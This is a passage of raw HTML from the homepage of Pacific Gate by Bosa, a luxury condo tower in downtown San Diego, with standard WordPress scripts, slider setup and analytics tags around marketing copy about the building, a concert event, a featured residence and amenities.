Development"},"image":{"@id":"https://pacificgatebybosa.com/en/#logo"}},{"@type":"WebSite","@id":"https://pacificgatebybosa.com/en/#website","url":"https://pacificgatebybosa.com/en/","name":"Pacific Gate","publisher":{"@id":"https://pacificgatebybosa.com/en/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://pacificgatebybosa.com/en/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://pacificgatebybosa.com/en/#webpage","url":"https://pacificgatebybosa.com/en/","inLanguage":"en-US","name":"Luxury Condos For Sale Downtown San Diego | New Apartments - Pacific Gate By Bosa","isPartOf":{"@id":"https://pacificgatebybosa.com/en/#website"},"about":{"@id":"https://pacificgatebybosa.com/en/#organization"},"datePublished":"2019-01-08T09:36:01+00:00","dateModified":"2019-04-29T03:46:41+00:00","description":"Pacific Gate is a brand new residential condominium tower in Downtown San Diego. The Super Prime building offers 2 and 3 bedroom luxury condos for sale, with world-class amenities and coastline views."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//cloud.typography.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Pacific Gate &raquo; Feed" href="https://pacificgatebybosa.com/en/feed/" /> <link rel="alternate" type="application/rss+xml" title="Pacific Gate &raquo; Comments Feed" href="https://pacificgatebybosa.com/en/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pacificgatebybosa.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <meta content="Pacific Gate v.1.0" name="generator"/><style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://pacificgatebybosa.com/wp-includes/css/dist/block-library/style.min.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='photomosaic-css' href='https://pacificgatebybosa.com/wp-content/plugins/photomosaic-for-wordpress/public/css/photomosaic.css?ver=2.15.8' type='text/css' media='all' /> <style id='photomosaic-inline-css' type='text/css'> /* your custom css here */ .photoMosaic a:hover img { opacity: 0.5; } img { max-height: 850px!important; } .photoMosaic.photomosaic-loading .photomosaic-spinner { background: #efefef; } /* .photomosaic-spinner-wrap:hover .photomosaic-spinner:before { font-family: ETmodules!important; font-weight: 400!important; content: "\e050"; color: #83c8bc; text-align: center; font-size: 3em; z-index:6000; background-color: transparent; } */ </style> <link rel='stylesheet' id='photomosaic-lightbox-css' href='https://pacificgatebybosa.com/wp-content/plugins/photomosaic-for-wordpress/public/vendor/prettyphoto/prettyphoto.css?ver=2.15.8' type='text/css' media='all' /> <link rel='stylesheet' id='et_monarch-css-css' href='https://pacificgatebybosa.com/wp-content/plugins/monarch/css/style.css?ver=1.4.12' type='text/css' media='all' /> <link rel='stylesheet' id='et-gf-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /> <link rel='stylesheet' id='fonts-css' href='//cloud.typography.com/801468/688288/css/fonts.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='myfonts-css-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/css/MyFontsWebfontsKit.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='toggle-css-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/css/toggles-pacificgate.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='tables-css-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/css/tables.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='blissFonts-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/css/BlissFont.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='modal-css-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/css/responsive.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='remodal-css-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/css/remodal.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='remodal-theme-css-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/css/remodal-default-theme.css?ver=5.0.4' type='text/css' media='all' /> <link rel='stylesheet' id='divi-style-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/style.css?ver=3.19.6' type='text/css' media='all' /> <link rel='stylesheet' id='et-shortcodes-responsive-css-css' href='https://pacificgatebybosa.com/wp-content/themes/Divi/epanel/shortcodes/css/shortcodes_responsive.css?ver=3.19.6' type='text/css' media='all' /> <link rel='stylesheet' id='magnific-popup-css' href='https://pacificgatebybosa.com/wp-content/themes/Divi/includes/builder/styles/magnific_popup.css?ver=3.19.6' type='text/css' media='all' /> <link rel='stylesheet' id='ms-main-css' href='https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/masterslider.main.css?ver=3.2.7' type='text/css' media='all' /> <link rel='stylesheet' id='ms-custom-css' href='https://pacificgatebybosa.com/wp-content/uploads/masterslider/custom.css?ver=106.6' type='text/css' media='all' /> <link rel='stylesheet' id='0-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/pacific-gate-ms-custom-skin.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='1-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/pacific-gate-ms-custom-skin-white.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='2-css' href='https://pacificgatebybosa.com/wp-content/themes/PacificGate/pacific-gate-ms-custom-skin-dark.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://pacificgatebybosa.com/wp-includes/css/dashicons.min.css?ver=5.0.4' type='text/css' media='all' /> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpgmza_google_api_status = {"message":"Enqueued","code":"ENQUEUED"}; /* ]]> */ </script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/wp-google-maps/wpgmza_data.js?ver=5.0.4'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/main.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/plugins/wpdatatables/assets/js/bootstrap/bootstrap.min.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/jquery.validate.min.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/additional-methods.min.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/jquery.mousewheel.min.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/bootstrap-formhelpers.min.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/toggles.min.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/responsive.min.js?ver=1'></script> <script type='text/javascript' src='https://pacificgatebybosa.com/wp-content/themes/PacificGate/js/remodal.min.js?ver=1'></script> <link rel='https://api.w.org/' href='https://pacificgatebybosa.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pacificgatebybosa.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://pacificgatebybosa.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.0.4" /> <link rel='shortlink' href='https://pacificgatebybosa.com/' /> <link rel="alternate" type="application/json+oembed" href="https://pacificgatebybosa.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpacificgatebybosa.com%2Fen%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://pacificgatebybosa.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpacificgatebybosa.com%2Fen%2F&#038;format=xml" /> <script>var ms_grabbing_curosr='https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/common/grabbing.cur',ms_grab_curosr='https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/common/grab.cur';</script> <meta name="generator" content="MasterSlider 3.2.7 - Responsive Touch Image Slider" /> <script type="text/javascript"> setTimeout(function(){var a=document.createElement("script"); var b=document.getElementsByTagName("script")[0]; a.src=document.location.protocol+"//script.crazyegg.com/pages/scripts/0033/7413.js?"+Math.floor(new Date().getTime()/3600000); a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1); </script> <link rel="alternate" href="https://pacificgatebybosa.com/en/" hreflang="en" /> <link rel="alternate" href="https://pacificgatebybosa.com/es/" hreflang="es" /> <link rel="alternate" href="https://pacificgatebybosa.com/zh/" hreflang="zh" /> <link rel="alternate" href="https://pacificgatebybosa.com/" hreflang="x-default" /> <style type="text/css" id="et-social-custom-css"> </style><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><style type="text/css" id="custom-background-css"> body.custom-background { background-color: #f9f9f9; } </style> <script type="text/javascript"> jQuery( document ).ready(function() { jQuery("a.more-link").text("Read Full Story "); }); </script> <!-- WordPress Facebook Open Graph protocol plugin (WPFBOGP v2.0.13) http://rynoweb.com/wordpress-plugins/ --> <meta property="fb:app_id" content="696369170513370"/> <meta property="og:url" content="https://pacificgatebybosa.com/"/> <meta property="og:title" content="Pacific Gate"/> <meta property="og:site_name" content="Pacific Gate"/> <meta property="og:description" content=""/> <meta property="og:type" content="website"/> <meta property="og:image" content="https://pacificgatebybosa.com/track.strikead.com/web/conv?type=img&#038;target=6587&#038;id=43889"/> <meta property="og:locale" content="en_us"/> <!-- // end wpfbogp --> <link rel="icon" href="https://pacificgatebybosa.com/wp-content/uploads/PG-Favicon.png" sizes="32x32" /> <link rel="icon" href="https://pacificgatebybosa.com/wp-content/uploads/PG-Favicon.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://pacificgatebybosa.com/wp-content/uploads/PG-Favicon.png" /> <meta name="msapplication-TileImage" content="https://pacificgatebybosa.com/wp-content/uploads/PG-Favicon.png" /> <link rel="stylesheet" id="et-core-unified-cached-inline-styles" href="https://pacificgatebybosa.com/wp-content/cache/et/1047/et-core-unified-155731484891.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /></head> <body class="home page-template-default page page-id-1047 custom-background _masterslider _msp_version_3.2.7 et_monarch et_pb_button_helper_class et_fixed_nav et_boxed_layout et_show_nav et_cover_background et_pb_side_nav_page et_pb_gutter et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns_1_4__1_2 et_header_style_centered et_pb_pagebuilder_layout et_smooth_scroll et_right_sidebar et_divi_theme et-db"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-P2673W8" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div id="page-container"> <header id="main-header" data-height-onload="108"> <div class="container clearfix et_menu_container"> <div class="logo_container"> <span class="logo_helper"></span> <a href="https://pacificgatebybosa.com/en/"> <img src="//pacificgatebybosa.com/wp-content/uploads/LogoTest_02.png" alt="Pacific Gate" id="logo" data-height-percentage="70" /> </a> <div class="top-header-info"> <div class="phone-link-header"><a href="tel:619.795.3612">619.795.3612</a></div> <div class="inquire-link-header"><a href="https://pacificgatebybosa.com/en/inquire-about-pacific-gate-be-first-in-line/">INQUIRE</a></div> <div class="social-link-header"> <li> <a href="https://www.facebook.com/PacificGateByBosa/" target="_blank"> <img src="https://pacificgatebybosa.com/wp-content/uploads/facebook.svg" alt="" /> </a> </li> <li> <a href="https://twitter.com/pacificgatebosa" target="_blank"> <img src="https://pacificgatebybosa.com/wp-content/uploads/twitter-1.svg" alt="" /> </a> </li> <li> <a href="https://www.instagram.com/pacificgatebybosa/" target="_blank"> <img src="https://pacificgatebybosa.com/wp-content/uploads/instagram-2.svg" alt="" /> </a> </li> </div> <div class="lang-switcher"><ul> <li class="lang-item lang-item-11 lang-item-es"><a lang="es-MX" hreflang="es-MX" href="https://pacificgatebybosa.com/es/">Español</a></li> <li class="lang-item lang-item-15 lang-item-zh"><a lang="zh-CN" hreflang="zh-CN" href="https://pacificgatebybosa.com/zh/">中文</a></li> </ul></div> </div> </div> <div id="et-top-navigation" data-height="108" data-fixed-height="64"> <nav id="top-menu-nav"> <ul id="top-menu" class="nav"><li id="menu-item-356" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-356"><a title="DESIGN" href="https://pacificgatebybosa.com/en/building-design/">DESIGN</a></li> <li id="menu-item-355" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-355"><a title="SUPER PRIME" href="https://pacificgatebybosa.com/en/super-prime/">SUPER PRIME</a></li> <li id="menu-item-354" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-354"><a title="SETTING" href="https://pacificgatebybosa.com/en/setting-lifestyle/">SETTING</a></li> <li id="menu-item-353" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-353"><a title="RESIDENCES" href="https://pacificgatebybosa.com/en/residences/">RESIDENCES</a></li> <li id="menu-item-4516" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4516"><a title="FLOOR PLANS" href="https://pacificgatebybosa.com/en/floor-plans-views-select/">FLOOR PLANS</a></li> <li id="menu-item-7929" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7929"><a href="https://pacificgatebybosa.com/en/gallery/">GALLERY</a></li> <li id="menu-item-351" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-351"><a title="SERVICES" href="https://pacificgatebybosa.com/en/services-amenities/">SERVICES</a></li> <li id="menu-item-5409" class="menu-press menu-item menu-item-type-post_type menu-item-object-page menu-item-5409"><a title="PRESS" href="https://pacificgatebybosa.com/en/press/">PRESS</a></li> <li id="menu-item-350" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-350"><a title="WORLD HOUSING" href="https://pacificgatebybosa.com/en/world-housing/">WORLD HOUSING</a></li> <li id="menu-item-349" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-349"><a title="CONTACT" href="https://pacificgatebybosa.com/en/contact/">CONTACT</a></li> </ul> </nav> <div id="et_mobile_nav_menu"> <div class="mobile_nav closed"> <span class="select_page">Select Page</span> <span class="mobile_menu_bar mobile_menu_bar_toggle"></span> </div> </div> </div> <!-- #et-top-navigation --> </div> <!-- .container --> <div class="et_search_outer"> <div class="container et_search_form_container"> <form role="search" method="get" class="et-search-form" action="https://pacificgatebybosa.com/en/"> <input type="search" class="et-search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </form> <span class="et_close_search_field"></span> </div> </div> </header> <!-- #main-header --> <div id="et-main-area"> <div id="main-content"> <article id="post-1047" class="post-1047 page type-page status-publish hentry"> <div class="entry-content"> <div id="et-boc" class="et-boc"> <div class="et_builder_inner_content et_pb_gutters3"> <div class="et_pb_section et_pb_section_0 home-section top et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_0 tagline-row"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_0 seo-text et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <h2>SOUNDS OF LUXURY CONCERT EVENT</h2> <h2>AN EVENING OF LIVE MUSIC AT DOWNTOWN’S FINEST ADDRESS</h2> <h3>THURSDAY MAY 16 | 6PM – 8PM</h3> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_0 home-button green et_hover_enabled et_pb_bg_layout_light" href="https://www.eventbrite.com/e/sounds-of-luxury-event-tickets-58882432942?aff=Website" target="_blank">RSVP TODAY</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_1 home-section et_section_regular"> <div class="et_pb_row et_pb_row_1 et_pb_gutters1 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <!-- MasterSlider --> <div id="P_MS5c72ed6b1e938" class="master-slider-parent ms-parent-id-58" style="max-width:1140px;" > <!-- MasterSlider Main --> <div id="MS5c72ed6b1e938" class="master-slider pacific_gate_skin" > <div class="ms-slide services-slider" data-delay="3" data-fill-mode="fill" > <img src="https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="Jaume Plensa&#039;s sculpture &quot;Pacific Soul&quot; in front of Pacific Gate" title="Jaume Plensa&#039;s sculpture &quot;Pacific Soul&quot; in front of Pacific Gate" data-src="https://pacificgatebybosa.com/wp-content/uploads/pacific-gate-carousel-1.jpg" /> </div> <div class="ms-slide services-slider" data-delay="3" data-fill-mode="fill" > <img src="https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="Motor Court for Pacific Gate" title="Motor Court for Pacific Gate" data-src="https://pacificgatebybosa.com/wp-content/uploads/pacific-gate-carousel-2.jpg" /> </div> <div class="ms-slide services-slider" data-delay="3" data-fill-mode="fill" > <img src="https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="Concierge Services at Pacific Gate" title="Concierge Services in Lobby of Pacific Gate" data-src="https://pacificgatebybosa.com/wp-content/uploads/pacific-gate-carousel-3.jpg" /> </div> <div class="ms-slide services-slider" data-delay="3" data-fill-mode="fill" > <img src="https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="Floor-to-ceiling windows at Pacific Gate" title="Floor-to-ceiling windows at Pacific Gate" data-src="https://pacificgatebybosa.com/wp-content/uploads/pacific-gate-carousel-4.jpg" /> </div> </div> <!-- END MasterSlider Main --> </div> <!-- END MasterSlider --> <script> ( window.MSReady = window.MSReady || [] ).push( function( $ ) { "use strict"; var masterslider_e938 = new MasterSlider(); // slider controls masterslider_e938.control('arrows' ,{ autohide:false, overVideo:true }); // slider setup masterslider_e938.setup("MS5c72ed6b1e938", { width : 1140, height : 499, minHeight : 0, space : 0, start : 1, grabCursor : false, swipe : true, mouse : true, keyboard : false, layout : "boxed", wheel : false, autoplay : false, instantStartLayers:true, mobileBGVideo:false, loop : true, shuffle : false, preload : 2, heightLimit : true, autoHeight : false, smoothHeight : true, endPause : false, overPause : true, fillMode : "fill", centerControls : true, startOnAppear : false, layersMode : "center", autofillTarget : "", hideLayers : false, fullscreenMargin: 0, speed : 20, dir : "h", parallaxMode : 'swipe', view : "basic" }); window.masterslider_instances = window.masterslider_instances || []; window.masterslider_instances.push( masterslider_e938 ); }); </script> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_2 home-section copy-section et_section_regular"> <div class="et_pb_row et_pb_row_2"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_2 home-copy et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <p>Pacific Gate by Bosa is a collection of new, luxury condo residences in Downtown San Diego and its iconic design is a fitting addition to the area’s continually transforming and vibrant scene. With stunning city and waterfront views, residents will enjoy the best of Downtown San Diego and be positioned at the center of it all. As the new premier luxury residences in San Diego, Pacific Gate by Bosa is redefining the city’s skyline with its dynamic architecture.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_3 home-copy desktop et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <p> A landmark designed to reflect the fluid forms of the shoreline, Pacific Gate offers more than just a place to call home. Its innovative architecture defines each residence as one of the most stunning and revolutionary developments in San Diego real estate. Pacific Gate offers flawless finishes and unparalleled services and amenities – not before seen in San Diego – all designed to bring the extraordinary to day-to-day living.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_3"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_button_module_wrapper et_pb_button_1_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_1 home-button gold et_hover_enabled et_pb_bg_layout_light" href="/en/building-design/">EXPLORE BUILDING DESIGN</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_3 home-section et_section_regular"> <div class="et_pb_row et_pb_row_4 video-row et_pb_gutters1 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_video et_pb_video_0 home-video"> <div class="et_pb_video_box"> <iframe src="https://player.vimeo.com/video/235005337?dnt=1&app_id=122963" width="1080" height="608" frameborder="0" title="Video File Name : Pacific Gate by Bosa &ndash; SD Luxury Condo Residences" allow="autoplay; fullscreen" allowfullscreen></iframe> </div> <div class="et_pb_video_overlay" style="background-image: url(//pacificgatebybosa.com/wp-content/uploads/movie-pacific-poster.jpg);"> <div class="et_pb_video_overlay_hover"> <a href="#" class="et_pb_video_play"></a> </div> </div> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_4 home-section et_section_regular"> <div class="et_pb_row et_pb_row_5 feature-row et_pb_gutters1 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_4 et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <h3>FEATURED RESIDENCE</h3> <h2>RESIDENCE 3105</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_text et_pb_text_5 et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <h3>ONE OF THE LAST AND FINEST 05 RESIDENCES</h3> <p>A floor plan great for entertaining, experience the distinct architecture of Pacific Gate with a curved wall featuring views from the North Embarcadero to the Coronado Bridge. </p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_2_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_2 home-button white-green et_pb_bg_layout_light" href="//pacificgatebybosa.com/floor-plans-views-select/#featured-residence">VIEW FEATURED RESIDENCE</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_6 home-copy mobile"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_6 et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <p> A landmark designed to reflect the fluid forms of the shoreline, Pacific Gate offers more than just a place to call home. Its innovative architecture defines each residence as one of the most stunning and revolutionary developments in San Diego real estate. Pacific Gate offers flawless finishes and unparalleled services and amenities – not before seen in San Diego – all designed to bring the extraordinary to day-to-day living.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_5 home-section bottom et_section_regular"> <div class="et_pb_row et_pb_row_7 et_pb_gutters1 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_7 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <!-- MasterSlider --> <div id="P_MS5c72f0a2ddc72" class="master-slider-parent ms-parent-id-56" style="max-width:1140px;" > <!-- MasterSlider Main --> <div id="MS5c72f0a2ddc72" class="master-slider pacific_gate_skin" > <div class="ms-slide services-slider" data-delay="3" data-fill-mode="fill" > <img src="https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="Private Boat Share" title="Private Boat Share" data-src="https://pacificgatebybosa.com/wp-content/uploads/pacific-gate-carousel-5.jpg" /> </div> <div class="ms-slide services-slider" data-delay="3" data-fill-mode="fill" > <img src="https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="Private Luxury Car Fleet" title="Private Luxury Car Fleet" data-src="https://pacificgatebybosa.com/wp-content/uploads/pacific-gate-carousel-6.jpg" /> </div> <div class="ms-slide services-slider" data-delay="3" data-fill-mode="fill" > <img src="https://pacificgatebybosa.com/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="Porter Services" title="Porter Services" data-src="https://pacificgatebybosa.com/wp-content/uploads/pacific-gate-carousel-7.jpg" /> </div> </div> <!-- END MasterSlider Main --> </div> <!-- END MasterSlider --> <script> ( window.MSReady = window.MSReady || [] ).push( function( $ ) { "use strict"; var masterslider_dc72 = new MasterSlider(); // slider controls masterslider_dc72.control('arrows' ,{ autohide:false, overVideo:true }); // slider setup masterslider_dc72.setup("MS5c72f0a2ddc72", { width : 1140, height : 499, minHeight : 0, space : 0, start : 1, grabCursor : false, swipe : true, mouse : true, keyboard : false, layout : "boxed", wheel : false, autoplay : false, instantStartLayers:true, mobileBGVideo:false, loop : true, shuffle : false, preload : 2, heightLimit : true, autoHeight : false, smoothHeight : true, endPause : false, overPause : true, fillMode : "fill", centerControls : true, startOnAppear : false, layersMode : "center", autofillTarget : "", hideLayers : false, fullscreenMargin: 0, speed : 20, dir : "h", parallaxMode : 'swipe', view : "basic" }); window.masterslider_instances = window.masterslider_instances || []; window.masterslider_instances.push( masterslider_dc72 ); }); </script> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_8"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_8 amenities-list desktop et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <h1>PRIVATE BOAT SHARE | PRIVATE LUXURY CAR FLEET | CHEF CONCIERGE SERVICES<br />PORTER SERVICES | OUTDOOR POOL TERRACE &amp; POOLSIDE CABANAS</h1> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_text et_pb_text_9 amenities-list mobile et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1>PRIVATE BOAT SHARE<br />PRIVATE LUXURY CAR FLEET<br />CHEF CONCIERGE SERVICES<br />PORTER SERVICES<br />OUTDOOR POOL TERRACE<br />&amp; POOLSIDE CABANAS</h1> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_3_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_3 home-button gold 